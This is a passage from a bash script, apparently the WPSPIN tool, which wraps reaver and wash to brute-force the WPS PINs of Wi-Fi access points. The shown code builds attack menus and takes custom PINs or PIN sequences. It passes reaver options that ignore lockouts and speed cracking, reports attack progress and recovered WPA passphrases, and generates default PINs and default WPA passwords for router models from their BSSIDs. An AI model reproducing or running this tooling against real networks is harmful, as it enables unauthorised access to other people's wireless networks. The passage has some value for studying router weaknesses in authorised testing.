  2677. echo -e "                                 your choice$rojo  "
  2678. echo ""
  2679. read -ep "                                      " ATTACK_MENUE_CHOICE
  2680. echo -e " $colorbase"
  2681. until [[ $ATTACK_MENUE_CHOICE = *[[:digit:]]* ]] && [[ "$ATTACK_MENUE_CHOICE" -lt "9" ]]  &&  [[ "$ATTACK_MENUE_CHOICE" -gt "0" ]]; do
  2682.  ATTACK_MENUE_DISPLAY
  2683. done
  2684.  
  2685. }
  2686.  
  2687.  
  2688. CUSTOMPIN()                     # This function is used to allow the user to manually enter a PIN to be tried first
  2689. {                               # option 2 in the attack menu
  2690.  
  2691. unset SELECTEDPIN 2> /dev/null  # we delete the former selected PIN if it remained set
  2692.  
  2693. echo ""
  2694. echo -e "        $colorbase     Enter the$amarillo 7 first digit$colorbase of the$amarillo PIN$colorbase you want to try first
  2695.                              (no checksum required)
  2696. $rojo"
  2697. read -ep "                                   " SELECTEDPIN
  2698. while !(echo $SELECTEDPIN | egrep -q "^([0-9]{7})$")
  2699.  do
  2700.    echo ""
  2701.    echo -e "                       $rojo ERROR: YOU DID NOT ENTER 7 NUMBERS $amarillo"
  2702.    CUSTOMPIN
  2703. done
  2704. echo -e "$colorbase"
  2705. }
  2706.  
  2707.  
  2708. SECATOR()                   # This function let the user choose for a sequence of PIN to try first, we determine 4 values, 2 4 digits strings
  2709. {                           # ( first half PIN ) and 2 3 digits strings ( second half )
  2710.  
  2711. unset INICIOSEQUENCEFIRST 2> /dev/null  #  We ensure that there is not former values stored
  2712. unset FINSEQUENCEFIRST 2> /dev/null     #
  2713.  
  2714.  if [[ "$HEAD3" = "0" ]]; then         # if the first half PIN hasn't been found yet we propose to customize sequence on the first PIN
  2715.     echo "+------------------------------------------------------------------------------+"
  2716.     echo -e "|        $azullight         1* DEFINING THE SEQUENCE FOR THE$verdefluo FIRST HALF PIN $colorbase             |"
  2717.     echo "+------------------------------------------------------------------------------+"
  2718.     ASKSSTARTSEQUENCE=$( echo -e "$colorbase Enter the 4 numbers at the$blanco beginning of the sequence$verdefluo ")
  2719.    
  2720.     read -ep "$ASKSSTARTSEQUENCE" INICIOSEQUENCEFIRST
  2721. while !(echo $INICIOSEQUENCEFIRST | egrep -q "^([0-9]{4})$")
  2722.            do
  2723.             echo ""
  2724.             echo -e "                       $rojo ERROR: YOU HAVE TO ENTER 4 NUMBERS $colorbase "
  2725.             echo ""
  2726.              read -ep "$ASKSSTARTSEQUENCE" INICIOSEQUENCEFIRST
  2727. done
  2728.    
  2729.     ASKENDSEQUENCE=$( echo -e "$colorbase Enter the 4 numbers at the$blanco end of the sequence$rojo ")
  2730.    
  2731.     read -ep "$ASKENDSEQUENCE" FINSEQUENCEFIRST                                                                      
  2732.    
  2733.    
  2734.           while !(echo $FINSEQUENCEFIRST | egrep -q "^([0-9]{4})$")
  2735.            do
  2736.             echo ""
  2737.             echo -e "                       $rojo ERROR: YOU HAVE TO ENTER 4 NUMBERS $colorbase "
  2738.             echo ""  
  2739.                 read -e -p "$ASKENDSEQUENCE" FINSEQUENCEFIRST                                                              
  2740.          done
  2741.  
  2742.   fi
  2743.  
  2744. unset INICIOSEQUENCESECOND 2> /dev/null  #  We ensure that there is not former values stored
  2745. unset FINSEQUENCESECOND 2> /dev/null
  2746.  
  2747.     echo -e "$colorbase+------------------------------------------------------------------------------+"
  2748.     echo -e "|       $azullight          2* DEFINING THE SEQUENCE FOR THE$rojo SECOND HALF PIN  $colorbase           |"
  2749.     echo -e "+------------------------------------------------------------------------------+"
  2750.     echo -e "|                  $blanco  ($amarillo no checksum required$blanco -$amarillo Enter X to exit$blanco )$colorbase                |"
  2751.     ASKSSTARTSEQUENCE2=$( echo -e "$colorbase Enter the 3 numbers at the$blanco beginning of the sequence$verdefluo ")
  2752.     read -ep "$ASKSSTARTSEQUENCE2" INICIOSEQUENCESECOND    
  2753.  
  2754.    
  2755.  
  2756.       while !(echo $INICIOSEQUENCESECOND | egrep -q "^([0-9]{3})$")
  2757.         do
  2758.             if [[ "$INICIOSEQUENCESECOND" == "X" || "$INICIOSEQUENCESECOND" == "x" ]] ; then
  2759.    
  2760.               break
  2761.             fi
  2762.           echo ""
  2763.           echo -e "                  $rojo ERROR: YOU HAVE TO ENTER 3 NUMBERS or X to EXIT $colorbase "
  2764.           echo ""
  2765.           read -ep "$ASKSSTARTSEQUENCE2" INICIOSEQUENCESECOND
  2766.       done
  2767.  
  2768.  
  2769.     ASKENDSEQUENCE2=$( echo -e "$colorbase Enter the 3 numbers at the$blanco end of the sequence$rojo ")
  2770.  
  2771.     read -ep "$ASKENDSEQUENCE2" FINSEQUENCESECOND
  2772.  
  2773.     while !(echo $FINSEQUENCESECOND | egrep -q "^([0-9]{3})$")  
  2774.       do
  2775.          if [[ "$FINSEQUENCESECOND" == "X" || "$FINSEQUENCESECOND" == "x" ]]; then
  2776.            break
  2777.          fi
  2778.           echo ""
  2779.           echo -e "                  $rojo ERROR: YOU HAVE TO ENTER 3 NUMBERS or X to EXIT $colorbase "
  2780.           echo ""
  2781.           read -ep "$ASKENDSEQUENCE2" FINSEQUENCESECOND
  2782.  
  2783.     done
  2784. echo -e "$colorbase+------------------------------------------------------------------------------+"
  2785. }
  2786.  
  2787.  
  2788.  
  2789.  
  2790. SUMUPNOM6()
  2791. {
  2792. PINECRAN=$( printf '%04d\n' $HEAD1 )
  2793. PINLEFT=`expr 11000 '-' $HEAD1`
  2794. PINLEFTECRAN=$( printf '%05d\n' $PINLEFT )
  2795. PORCENT1=`expr $HEAD1 '*' 100 '/' 11`
  2796.  
  2797. PORCENT2=$( printf '%05d\n' $PORCENT1 )
  2798.  
  2799. INICIOPORCENT=$( echo "$PORCENT2" | cut -b -2 )
  2800.  
  2801. ENDPORCENT=$( echo "$PORCENT2" | cut -b 3- )
  2802.  
  2803.  
  2804. echo " +--------------------------------------+"
  2805. echo -e " |   $amarillo             SUM-UP        $colorbase        | "  
  2806. echo " +--------------------------------------+"
  2807. echo -e " |      Attacking the$rojo first$colorbase half        | "
  2808. echo -e " |    First half PIN tried - $amarillo $PINECRAN$colorbase      |"    
  2809. echo -e " |      Maximum$amarillo $PINLEFTECRAN$colorbase PIN left          |"
  2810. echo " +--------------------------------------+"
  2811. echo -e " | $rojo$INICIOPORCENT$colorbase,$rojo$ENDPORCENT$colorbase% of the attack has been made  |"
  2812. echo " +--------------------------------------+"  
  2813.  
  2814.  
  2815. }
  2816.  
  2817.  
  2818.  
  2819. SUMUPM6()
  2820. {
  2821.  
  2822. PINECRAN=$( printf '%04d\n' $HEAD1 )
  2823. PINECRAN2=$( printf '%03d\n' $HEAD2 )
  2824. PINLEFT=`expr 1000 '-' $HEAD2`
  2825. PINLEFTECRAN=$( printf '%03d\n' $PINLEFT )
  2826. PORCENT1=`expr '(' $HEAD2 '+' 10000 ')' '*' 100 '/' 11`
  2827.  
  2828. PORCENT2=$( printf '%04d\n' $PORCENT1 )
  2829. INICIOPORCENT=$( echo "$PORCENT2" | cut -b -2 )
  2830. ENDPORCENT=$( echo "$PORCENT2" | cut -b 2- )
  2831. echo -e " $colorbase "  
  2832. echo "+------------------------------------------------------------------------------+"
  2833. echo -e "|   $amarillo                                 SUM-UP                            $colorbase        |"    
  2834. echo "+------------------------------------------------------------------------------+"
  2835. echo -e "|   $verdefluo   THE FIRST HALF IS FOUND !  $colorbase      |      Attacking the$rojo second$colorbase half       |"
  2836. echo -e "|               $amarillo $PRIMERAMITAD$colorbase                   |     Second half PIN tried - $amarillo $PINECRAN2$colorbase     |"
  2837. echo -e "|    First half PIN tried - $verdefluo $PINECRAN$colorbase       |       Maximum$amarillo $PINLEFTECRAN$colorbase PIN left           |"    
  2838.  
  2839. echo "+------------------------------------------------------------------------------+"
  2840. echo -e "|                     $rojo$INICIOPORCENT$colorbase,$rojo$ENDPORCENT$colorbase% of the attack has been made                     |"
  2841. echo "+------------------------------------------------------------------------------+"  
  2842. echo -e "$colorbase"
  2843.  
  2844. }
  2845.  
  2846.  
  2847.  
  2848. PINFOUND(){
  2849.  
  2850. DATE=$(  date | cut -d "," -f 1 )
  2851. NEWNAME=${DATE// /_}
  2852. DISPLAYNEWNAME1=$( echo "$NEWNAME-$WPCNAME                                                            " | cut -b -70 )
  2853. DISPLAYNAME=$( echo "$DISPLAYNEWNAME1 $colorbase|")
  2854. echo -e " $colorbase "  
  2855. echo "+------------------------------------------------------------------------------+"
  2856. echo -e "|       $verdefluo  THE PIN HAS BEEN FOUND !            $colorbase pin is $amarillo$PIN    $colorbase             |"
  2857. echo "+------------------------------------------------------------------------------+"
  2858. echo "|              *.wpc session backed up in your WPSPIN folder as                |"
  2859. echo -e "|       $azulfluo$DISPLAYNAME"
  2860. echo "+------------------------------------------------------------------------------+"
  2861.  
  2862. cat "$DIRECTORY/$WPCNAME" >> "$NEWNAME$WPCNAME"
  2863.  
  2864. rm -r "$DIRECTORY/$WPCNAME"
  2865.  
  2866. }
  2867.  
  2868.  
  2869.  
  2870. FAILEDREAVER()
  2871. {
  2872. echo "+------------------------------------------------------------------------------+"
  2873. echo -e "$rojo                                  ERROR $colorbase
  2874. +------------------------------------------------------------------------------+
  2875. $blanco                Reaver was unable to initialise interface$amarillo $MON_ATTACK$blanco
  2876.  
  2877.  - Check your$amarillo wireless button$blanco
  2878.  - Check your$amarillo USB ports/connection$blanco
  2879.  -$amarillo Disconnect$blanco all devices
  2880.  
  2881. ... We try to$verdefluo fix this$blanco and Send you back in the$kindofviolet interface menu
  2882. $colorbase"
  2883. sleep 5
  2884.  
  2885.   if [[ -n `(airmon-ng stop $MON_ATTACK | grep SIOCSIFFLAGS )` ]]; &>/dev/null
  2886.     then
  2887. echo "--------------------------------------------------------------------------------"
  2888. echo -e " $rojo                      RF-Kill is blocking the device
  2889.  
  2890. $verdefluo     Check if your wireless is activated and check your wireless buttons ! $colorbase"
  2891. echo "--------------------------------------------------------------------------------"  
  2892. sleep 5
  2893. fi
  2894.  
  2895. rm attack.txt
  2896. unset MON_ATTACK
  2897. IFACE
  2898. BIG_MENUE
  2899. }
  2900.  
  2901.  
  2902.  
  2903.  
  2904. FAKEM4WARNING()
  2905. {
  2906. echo -e "$colorbase"
  2907. echo "+------------------------------------------------------------------------------+"
  2908. echo -e "| $rojo                        SUSPICIOUS M4 DETECTED$colorbase                               |"
  2909. echo "+------------------------------------------------------------------------------+"
  2910. echo -e "|$blanco Sometimes reaver processes M4 that hasn't been fully checked and the key is$colorbase  |"
  2911. echo -e "|$blanco   not recovered. If this happens to you$rojo delete the file $amarillo$WPCNAME$colorbase     |"
  2912. echo -e "|$blanco      rename the file$amarillo BACKUPfakeM4_$WPCNAME$blanco as$verdefluo $WPCNAME$colorbase       |"
  2913. echo -e "|$blanco                  You will get back to the first$rojo suspicious M4$colorbase                |"
  2914. echo "+------------------------------------------------------------------------------+"
  2915. echo -e "$colorbase"
  2916. }
  2917.  
  2918.  
  2919. FAKEM6WARNING()
  2920. {
  2921. echo -e "$colorbase"
  2922. echo "+------------------------------------------------------------------------------+"
  2923. echo -e "| $rojo                        SUSPICIOUS M6 DETECTED$colorbase                               |"
  2924. echo "+------------------------------------------------------------------------------+"
  2925. echo -e "|$blanco Sometimes reaver processes M6 that hasn't been fully checked and the key is$colorbase  |"
  2926. echo -e "|$blanco    not recovered. If this happens to you$rojo delete the file $amarillo$WPCNAME$colorbase    |"
  2927. echo -e "|$blanco      rename the file$amarillo BACKUPfakeM6_$WPCNAME$blanco as$verdefluo $WPCNAME$colorbase       |"
  2928. echo -e "|$blanco                  You will get back to the first$rojo suspicious M6$colorbase                |"
  2929. echo "+------------------------------------------------------------------------------+"
  2930. echo -e "$colorbase"
  2931. }
  2932.  
  2933.  
  2934.  
  2935. CUSTOMREAVER()
  2936. {
  2937. echo -e "$colorbase+------------------------------------------------------------------------------+
  2938. |                  $violet          AVALAIBLE OPTIONS           $colorbase                      |
  2939. +------------------------------------------------------------------------------+
  2940. |$amarillo -e$colorbase --essid=<ssid>    $blanco          ESSID of the target AP    $colorbase                    |
  2941. |$amarillo -c$colorbase --channel=<channel>    $blanco     Set the 802.11 channel for the interface  $colorbase    |
  2942. |                                $blanco            (implies -f)         $colorbase             |
  2943. |$amarillo -D$colorbase --daemonize   $blanco              Daemonize reaver         $colorbase                     |
  2944. |$amarillo -a$colorbase --auto       $blanco               Auto detect the best advanced options for   $colorbase  |
  2945. |                                     $blanco          the AP       $colorbase                  |
  2946. |$amarillo -f$colorbase --fixed       $blanco              Disable channel hopping           $colorbase            |
  2947. |$amarillo -5$colorbase --5ghz          $blanco            Use 5GHz 802.11 channels       $colorbase               |
  2948. |$amarillo -d$colorbase --delay=<seconds>  $blanco         Set the delay between pin attempts [1] $colorbase       |
  2949. |$amarillo -l$colorbase --lock-delay=<seconds> $blanco     Set the time to wait if the AP locks WPS pin $colorbase |
  2950. |                                        $blanco    attempts [60]               $colorbase      |
  2951. |$amarillo -g$colorbase --max-attempts=<num>    $blanco    Quit after certain number of pin attempts$colorbase     |
  2952. |$amarillo -x$colorbase --fail-wait=<seconds>   $blanco    Set the time to sleep after 10 unexpected   $colorbase  |
  2953. |                                   $blanco          failures [0]              $colorbase       |
  2954. |$amarillo -r$colorbase --recurring-delay=<x:y>   $blanco  Sleep for y seconds every x pin attempts  $colorbase    |
  2955. |$amarillo -t$colorbase --timeout=<seconds>       $blanco  Set the receive timeout period [5]        $colorbase    |
  2956. |$amarillo -T$colorbase --m57-timeout=<seconds>  $blanco   Set the M5/M7 timeout period [0.20]   $colorbase        |
  2957. |$amarillo -A$colorbase --no-associate       $blanco       Do not associate with the AP       $colorbase           |
  2958. |                         $blanco    (association must be done by another application)$colorbase|
  2959. |$amarillo -N$colorbase --no-nacks       $blanco          Do not send NACK messages when out of order  $colorbase  |
  2960. |                                   $blanco      packets are received   $colorbase              |
  2961. |$amarillo -S$colorbase --dh-small      $blanco            Use small DH keys to improve crack speed $colorbase     |
  2962. |$amarillo -L$colorbase --ignore-locks      $blanco        Ignore locked state reported by the target AP$colorbase |
  2963. |$amarillo -E$colorbase --eap-terminate     $blanco        Terminate each WPS session with an    $colorbase        |
  2964. |                                   $blanco        EAP FAIL packet           $colorbase         |
  2965. |$amarillo -n$colorbase --nack           $blanco           Target AP always sends a NACK [Auto]  $colorbase        |
  2966. |$amarillo -w$colorbase --win7          $blanco            Mimic a Windows 7 registrar [False]      $colorbase     |
  2967. +------------------------------------------------------------------------------+
  2968. Red arguments are mandatory ($rojo reaver -i $MON_ATTACK -b $BSSID$colorbase )
  2969. Complete the line  below$colorbase. Add$amarillo -c $CHANNEL$colorbase to fix your target channel.
  2970. Add $amarillo-vv $colorbase to get detailed information during the attack ( full verbose )
  2971. good luck :) $amarillo
  2972. "
  2973. MANDATORY=$( echo -e "$rojo reaver -i $MON_ATTACK -b $BSSID$verdefluo")
  2974. read -e -p " $MANDATORY " REAVERCOMMAND
  2975. echo -e "$colorbase"
  2976.  
  2977. until [ -z `echo $REAVERCOMMAND | tr vecDaf1234567890dlgxrtTANSLEnw - | tr -d "-" | tr -d ' '` ] ;
  2978. do
  2979.  echo -e "$rojo error,$blanco invalid argument, check the list above"
  2980.  echo "complete the line with valid syntaxs or just press enter
  2981. "
  2982.  read -e -p " $MANDATORY " REAVERCOMMAND
  2983.  echo -e "$colorbase"
  2984. done
  2985. echo -e "$blanco Your customized line is memorised and will be used in the next attack$colorbase
  2986. You can now launch the attack ($blanco 1 $colorbase) with the PIN indicated in the menu.
  2987. You may insert another PIN ($blanco 2$colorbase ) or define a sequence of PIN ($blanco 3 $colorbase)
  2988.  
  2989. "
  2990.  
  2991. }
  2992.  
  2993.  
  2994. MON_ADVERTENCIA=$( echo -e "                                        
  2995.                 $rojo              WARNING
  2996. $colorbase
  2997. $rojo   Only one chipset is available and airmon-ng doesn't fully recognize it
  2998.                scanning and WPS attack may not work properly :(  
  2999. $colorbase
  3000. " )                                                                # warning the user if his chipset is not fully recognized by airmon-ng
  3001.  
  3002.  
  3003.  
  3004.  
  3005.  
  3006. INTERFACEDESIGN=$( echo -e "$colorbase
  3007.   NUMBER     INTERFACE        CHIPSET & DRIVER
  3008.              ---------------------------------------------------  
  3009. $blanco")                                                               # up part of the interface selection menu  
  3010.  
  3011.  
  3012.  
  3013.  
  3014.  
  3015. WASHWAIT=$(echo "+------------------------------------------------------------------------------+"
  3016.         echo -e "|                $verdefluo       THE SCAN WITH WASH IS LAUNCHED$colorbase                         |
  3017. +------------------------------------------------------------------------------+
  3018. |$blanco Default PIN will be displayed: $colorbase                                              |
  3019. |                                                                              |
  3020. |$blanco  - in$verdefluo green$blanco if the device is supported  $colorbase                                     |
  3021. |$blanco  - in$orange orange$blanco if the device is unknown $colorbase                                       |
  3022. |$blanco  - in$rojo red$blanco with no numeric value if the device is unsupported $colorbase                |
  3023. |                                                                              |
  3024. |$azulfluo If BSSID is blue$blanco the default WPA will be generated if the target is selected$colorbase |
  3025. |                                                                              |
  3026. +------------------------------------------------------------------------------+
  3027. |         $magenta         CLOSE THE SCAN WINDOW TO GET TO THE NEXT STEP $colorbase              |
  3028. +------------------------------------------------------------------------------+")
  3029.  
  3030.  
  3031.  
  3032.  
  3033.  
  3034.  
  3035. NO_MONITOR_MODE=$(echo -e "$rojo          WARNING$colorbase :$amarillo  NO COMPATIBLE WIRELESS INTERFACE IS AVAILABLE  $colorbase
  3036.  
  3037. $rojo     WPSPIN will be executed in a reduced mode without scanning or attack$colorbase
  3038. $rojo             You can reload interface checking with option 2$colorbase")
  3039.  
  3040.  
  3041.  
  3042.  
  3043. NO_REAVER=$(echo -e "$rojo          WARNING$colorbase :$amarillo    REAVER WPS IS NOT PRESENT IN THE SYSTEM  $colorbase
  3044.  
  3045. $rojo     WPSPIN will be executed in a reduced mode without scanning or attack$colorbase
  3046. $rojo    Install reaver 1.3 or reaver 1.4 (by svn) to enjoy all WPSPIN features$colorbase")
  3047.  
  3048.  
  3049.  
  3050. FAILED=$(echo -e "
  3051.                       +-----------------------------------+
  3052.                       |     $blanco   The attack has failed $colorbase     |
  3053.                       +-----------------------------------+
  3054.                       |  $rojo     WPA PASSPHRASE NOT FOUND!$colorbase   |  
  3055.                       +-----------------------------------+
  3056. " )
  3057.  
  3058. KEY_FOUND=$(echo -e "
  3059.                      +------------------------------------+
  3060.                      |$verdefluo     WPA PASSPHRASE RECOVERED!     $colorbase |
  3061.                      +------------------------------------+
  3062.                      Results saved in your WPSPIN folder in $colorbase "
  3063.  )
  3064.  
  3065.  
  3066.  
  3067.  
  3068. STOP_REAVER=$(echo -e " $rojo                      < CTRL + C > TO STOP THE ATTACK $colorbase "
  3069.  )
  3070.  
  3071.  
  3072. AIRMON_WARNING=$(echo -e "                                                      
  3073. $tojo                        WARNING!$amarillo UNKNOWN CHIPSET SELECTED
  3074.  
  3075. $rojo                    Scan and attack may not work properly
  3076. $rojo                 You should use option 3 and change interface$colorbase "
  3077.  )                                                                             # warning display for unknown chipset
  3078.  
  3079.  
  3080.  
  3081.  
  3082. ROOT_ADVERTENCIA=$( echo -e "                                        
  3083.                 $tojo         WARNING -$amarillo NO ROOT PRIVILEGES
  3084. $colorbase
  3085. $rojo        You are not logged as root and cannot use fully WPSPIN,
  3086.  launch the script with sudo or start again in a shell with root privileges$colorbase"
  3087. )                                                                                              # warning display for non root user
  3088.  
  3089.  
  3090.  
  3091.  
  3092. DIRECTORY_ADVERTENCIA=$( echo -e "                                        
  3093.                 $tojo           WARNING -$amarillo BAD LOCATION
  3094. $colorbase
  3095. $rojo You have to be situated in the WPSPIN directory to execute the script correctly
  3096.       Leave the script in it original folder, do not rename the folder
  3097.                  use the cd command for a correct location$colorbase"
  3098. )  
  3099.  
  3100.  
  3101.  
  3102.  
  3103. ##########################################################################################
  3104. elif [ "$SELECTIONLANGUE" == 2 ]; then ################################### 2 > ESPAÑOL  ########################################################################
  3105.  
  3106. OUTPUT(){
  3107.  
  3108. echo -e "$colorbase"
  3109. echo "+------------------------------------------------------------------------------+"
  3110. echo -e "| $violet                     INFORMACIÓN  SOBRE DISPOSITIVO   $colorbase                       |"
  3111. echo "+------------------------------------------------------------------------------+"
  3112.  
  3113. if [ -n "${FABRICANTE}" ]; then
  3114.      DISPLAYFABRICANTE=$( echo "$FABRICANTE                                                              " | cut -b -61 )
  3115. echo -e "| Fabricante   :$amarillo $DISPLAYFABRICANTE $colorbase|"
  3116. fi
  3117.  
  3118. if [ -n "${DEFAULTSSID}" ]; then
  3119.     DISPLAYDEFAULTSSID=$( echo "$DEFAULTSSID                                                              " | cut -b -61 )                                                            
  3120.      echo -e "| SSID defecto :$amarillo $DISPLAYDEFAULTSSID $colorbase|"
  3121. fi
  3122.  
  3123. if [ -n "${MODEL}" ]; then
  3124. DISPLAYMODEL=$( echo "$MODEL                                                              " | cut -b -61 )
  3125.      echo -e "| Modelo       :$amarillo $DISPLAYMODEL $colorbase|"
  3126. fi
  3127.  
  3128.      unset DISPLAYFABRICANTE && unset DISPLAYDEFAULTSSID && unset DISPLAYMODEL
  3129.  
  3130. if [ "$UNKNOWN" -eq "0"  ];
  3131.     then
  3132.  
  3133.      echo "+------------------------------------------------------------------------------+"
  3134.      echo -e "|                   $violet        INFORMACION SOBRE WPS    $colorbase                          |"
  3135.      echo "+------------------------------------------------------------------------------+"
  3136.  
  3137.        if [ "$ACTIVATED" -eq "1" ] ;
  3138.         then
  3139.           echo -e "| $verdefluo                         WPS ACTIVADO POR DEFECTO    $colorbase                        |"
  3140.           echo "+------------------------------------------------------------------------------+"
  3141.        else
  3142.           echo -e "|        $rojo                WPS NO ACTIVADO POR DEFECTO      $colorbase                     |"
  3143.           echo "+------------------------------------------------------------------------------+"  
  3144.        fi
  3145.  
  3146.       if  [ "$APRATE" -eq "0" ] ;
  3147.         then
  3148.         echo -e "|        $verdefluo                NO SISTEMA DE BLOQUEO DEL WPS      $colorbase                   |"  
  3149.         echo "+------------------------------------------------------------------------------+"
  3150.       else
  3151.         echo -e "|   $rojo       CUIDADO : EXISTE UN SISTEMA DE DEFENSA DE BLOQUEO DEL WPS   $colorbase        |"
  3152.         echo "+------------------------------------------------------------------------------+"
  3153.       fi
  3154.  
  3155.       if  [ "$SPECIAL" -eq "1" ] ;
  3156.         then
  3157.         echo -e "| $rojo  COMPRUEBE EL MODELO EXACTO, VARIOS MODELOS COMPARTEN ESTE RANGO DE BSSID $colorbase  |"
  3158.         echo "+------------------------------------------------------------------------------+"
  3159.       fi
  3160.   DISPLAYPIN=$( echo "$PIN $PIN1 $PIN2 $PIN3 $PIN4 $PIN5 $PIN6 $PIN7 $PIN8                                                                   " | cut -b -78 )        
  3161.  
  3162. echo "+------------------------------------------------------------------------------+"
  3163. echo -e "|       $violet                     PIN(s) por DEFECTO     $colorbase                           |"    
  3164. echo -e "|$amarillo$DISPLAYPIN$colorbase|"
  3165. echo "+------------------------------------------------------------------------------+"
  3166.  
  3167.   elif [ "$UNKNOWN" -eq "1"  ]; then
  3168.  
  3169.  
  3170.     echo "+------------------------------------------------------------------------------+"
  3171.     echo -e "|          $orange                  MODELO DESCONOCIDO           $colorbase                     |"
  3172.     echo "|                                                                              |"
  3173.     echo "+------------------------------------------------------------------------------+"
  3174.     echo -e "|                        $orange PIN POSSIBLE :$amarillo $PIN        $colorbase                      |"
  3175.     echo "+------------------------------------------------------------------------------+"
  3176.  
  3177. else
  3178.     echo "+------------------------------------------------------------------------------+"
  3179.     echo -e "|          $rojo                   MODELO NO SOPORTADO  $colorbase                            |"
  3180.     echo "|                                                                              |"
  3181.     echo "+------------------------------------------------------------------------------+"
  3182.  
  3183.  
  3184. fi
  3185.  
  3186. if [ -n "${DEFAULTWPA}" ]; then
  3187. DEFAULTWPADISPLAY=$(echo "$DEFAULTWPA                                                                           " | cut -c -78)
  3188.  echo -e "|  $violet                      CONTRASEÑA WPA POR DEFECTO $colorbase                           |"
  3189.  echo -e "|$verdefluo$DEFAULTWPADISPLAY$colorbase|"
  3190.  echo "+------------------------------------------------------------------------------+"
  3191. fi
  3192.  
  3193.  
  3194. }
  3195.  
  3196.  
  3197.  
  3198. DATASGENERADOR(){
  3199. echo ""
  3200. echo -e "                    -------------------------------------"
  3201. echo ""
  3202. read -ep "                1 > Insertar el Essid y darle a <Enter> : "  ESSID          # essid como variable - gracias r00tnuLL por el "ep" ;)                
  3203. echo "  "
  3204. read -ep "                2 > Insertar el Bssid y darle a <Enter> : " BSSID           # bssid como variable
  3205. echo "  "
  3206.   while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
  3207.    do                                                              # filtro bssid haciendo un bucle while sobre condición... gracias antares XD
  3208.    echo -e " $rojo Error de sintaxis : MAC Non Conforme $colorbase"
  3209.    echo "  "
  3210.    read -ep "                2 > Insertar el Bssid y darle a <Enter> : " BSSID
  3211.    echo "  "            
  3212.   done
  3213. }
  3214.  
  3215.  
  3216.  
  3217.  
  3218.  
  3219. SHORTMENUE(){                                                 # Menú en el cual esta limitado el usuario sin mode monitor, solo generador
  3220.  
  3221.  
  3222.  
  3223.                        # 3 es para salir de WPSPIN, hasta que el usuario no entre tres nos quedemos en el menú
  3224.  
  3225.  
  3226. echo "$SORTMENUE_WARNING"
  3227. echo ""
  3228. echo ""
  3229. echo -e "                              $orange       ¿   $negro  ?           "
  3230. echo -e "                            $verde    ?   $azul    ?      $colorbase        "
  3231. echo -e "                        $blanco       ¿ $colorbase  >X<  $gris  ¿         $colorbase "    
  3232. echo -e "                               -  (O o)  -         "
  3233. echo -e "                    +---------ooO--(_)--Ooo-------------+   "
  3234. echo -e "                    |                                   |   "
  3235. echo -e "                    | $blanco   1$colorbase -$amarillo  GENERAR PIN$colorbase               |   "
  3236. echo -e "                    | $blanco   2$colorbase -$amarillo  REDETECTAR INTERFACES$colorbase     |   "
  3237. echo -e "                    | $blanco   3$colorbase -$amarillo  SALIR$colorbase                     |   "
  3238. echo -e "                    |                                   |   "
  3239. echo -e "                    +-----------------------------------+   "
  3240. echo ""
  3241. echo ""
  3242. echo ""
  3243. echo -e "                              su elección : $rojo"                    
  3244. echo ""  
  3245. read -ep  "                                      " SHORTMENUE_CHOICE                
  3246. echo -e "$colorbase"
  3247.  
  3248.  
  3249. if [ "$SHORTMENUE_CHOICE" == "1" ] ; then
  3250.  
  3251.     DATASGENERADOR
  3252.     GENERATE
  3253.     OUTPUT
  3254. unset PIN2 && unset PIN3 && unset PIN4 && unset PIN5 && unset PIN6 && unset PIN7 && unset PIN8 && unset  FABRICANTE  && unset DEFAULTSSID   && unset MODEL
  3255.  
  3256. echo -e " "
  3257. echo -e "      ...$verdefluo pulsa <enter> para seguir adelante$colorbase ..."    # pausamos el proceso ara que el usuario pueda apuntar o copiar los datos
  3258. read -ep "" NIENTE
  3259.  
  3260.    SHORTMENUE  
  3261.  
  3262. elif [ "$SHORTMENUE_CHOICE" == "2" ] ; then
  3263.  
  3264.     IFACE
  3265.  
  3266. elif [ "$SHORTMENUE_CHOICE" == "3" ]; then
  3267.  
  3268. CLEAN
  3269. CIAO
  3270.  
  3271. exit
  3272.  
  3273. else
  3274.  
  3275. echo -e " ................  $magenta opción inválida$colorbase ........"
  3276.  
  3277.  SHORTMENUE
  3278.    
  3279.  
  3280. fi
  3281.  
  3282. }
  3283.  
  3284.  
  3285. SELECT_THEIFACE (){
  3286. read -ep "                           elegir la interfaz : " i        # ask the user to choose among avalaible interfaces  
  3287. }
  3288.  
  3289.  
  3290.  
  3291. WASH_DISPLAY(){    
  3292.  
  3293.  
  3294. if [ "$WALSH_O_WASH" == "wash" ]; then                        # WE make a break here to be able to just display the results later and because it was confusing for langiages
  3295.  
  3296.  
  3297. echo "--------------------------------------------------------------------------------"        # devolvemos el resultado reorganizandolo
  3298. echo -e "  $blanco          BSSID        RSSI  WPS Abierto   PIN   Canal    ESSID  $colorbase"          
  3299. echo "--------------------------------------------------------------------------------"
  3300. echo ""
  3301.  
  3302. else
  3303.  
  3304. echo "--------------------------------------------------------------------------------"        # devolvemos el resultado reorganizandolo
  3305. echo -e "  $blanco           BSSID                 PIN               ESSID  $colorbase"          
  3306. echo "--------------------------------------------------------------------------------"
  3307. echo ""
  3308.  
  3309. fi
  3310.  
  3311. for i in ${!BSSID[*]}; do
  3312.  
  3313.   CHANNEL_CHECK=$(echo ${CHANNEL[${i}]})
  3314.   LOCK_CHECK=$(echo ${LOCKED[${i}]})
  3315.   BSSID=$(echo ${BSSID[${i}]})
  3316.   ESSID=$(echo ${ESSID[${i}]})
  3317.  
  3318.   GENERATE
  3319.   if [ "$WALSH_O_WASH" == "wash" ]; then
  3320.     if [ "$LOCK_CHECK" = "No" ]; then
  3321.      DISPLAY_LOCKED=$( echo -e "$verde Si$colorbae")
  3322.     else
  3323.      DISPLAY_LOCKED=$( echo -e "$rojo No$colorbae")  
  3324.     fi
  3325.  
  3326.     if [ "$CHANNEL_CHECK" -lt 10 ]; then
  3327.      DISPLY_CHANNEL=$( echo " $CHANNEL_CHECK")
  3328.     else
  3329.      DISPLY_CHANNEL=$(echo ${CHANNEL[${i}]})
  3330.     fi
  3331.   fi
  3332.    
  3333.   if [ "$UNKNOWN" = 1 ]; then
  3334.     DISPLAY_PIN=$( echo -e "$orange   $PIN$colorbase" )
  3335.   elif [ "$UNKNOWN" = 0 ]; then
  3336.     DISPLAY_PIN=$( echo -e "$verdefluo   $PIN$colorbase" )
  3337.   else
  3338.     DISPLAY_PIN=$( echo -e "$rojo NO SOPORTE$colorbase" )
  3339.   fi
  3340.  
  3341.   if [ "$i" -lt 10 ]; then
  3342.     NUM=$( echo -e " $amarillo$i$colorbase")
  3343.   else
  3344.     NUM=$( echo -e "$amarillo$i$colorbase")
  3345.   fi
  3346.  
  3347.  
